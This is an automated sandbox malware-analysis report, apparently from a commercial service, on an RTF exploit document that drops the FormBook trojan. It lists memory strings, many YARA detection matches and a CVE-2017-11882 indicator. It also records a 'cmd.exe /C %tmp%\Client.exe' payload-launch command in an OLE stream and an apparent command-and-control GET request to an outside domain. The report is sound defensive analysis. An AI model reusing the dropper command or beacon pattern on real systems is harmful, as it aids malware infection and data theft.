          Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: Client.exe, 00000005.00000002.947458698.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000000A.00000000.1008328661.0000000006450000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000A.00000000.976786692.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000000A.00000000.978377131.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010833057.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993943393.0000000008611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner1SPS0
          Source: explorer.exe, 0000000A.00000000.1010360758.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995439916.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979257547.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.950353171.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.994846785.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979787030.000000000880D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.992888492.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011293822.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993114505.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010156944.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.976835880.00000000084D2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.1029291046.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.986329833.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.958357895.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerq
          Source: explorer.exe, 0000000A.00000000.988586812.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1006236115.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.968187098.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB22E69-27EE-49FB-B577-3348055FCC0D}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: www.magadirect.co.uk
          Source: global trafficHTTP traffic detected: GET /aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM HTTP/1.1Host: www.magadirect.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /2014/sqlite-dll-win32-x86-3080700.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.sqlite.orgConnection: Keep-Alive
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASSJump to behavior

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Client.exe PID: 2948, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: notepad.exe PID: 2496, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: NAPSTAT.EXE PID: 204, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
          Document contains OLE streams which likely are hidden ActiveX objects
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.drStream path '_1721465586/\x1Ole10Native' : z....Client.exe.C:\Path\Client.exe.........C:\Path
          Office process drops PE file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exeJump to dropped file
          Document contains OLE streams with names of living off the land binaries
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.drStream path '_1721465588/Equation Native' : ...............\.[.............ZZCmD.exe /C %tmp%\Client.exe A..C................................................................................................................
          PE file has nameless sections
          Source: Client.exe.0.drStatic PE information: section name:
          Found suspicious RTF objects
          Source: Client.exeStatic RTF information: Object: 0 Offset: 0000128Dh Client.exe
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf, type: SAMPLEMatched rule: MAL_RTF_Embedded_OLE_PE date = 2018-01-22, author = Florian Roth, description = Detects a suspicious string often used in PE files in a hex encoded object stream, reference = https://www.nextron-systems.com/2018/01/22/creating-yara-rules-detect-embedded-exe-files-ole-objects/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
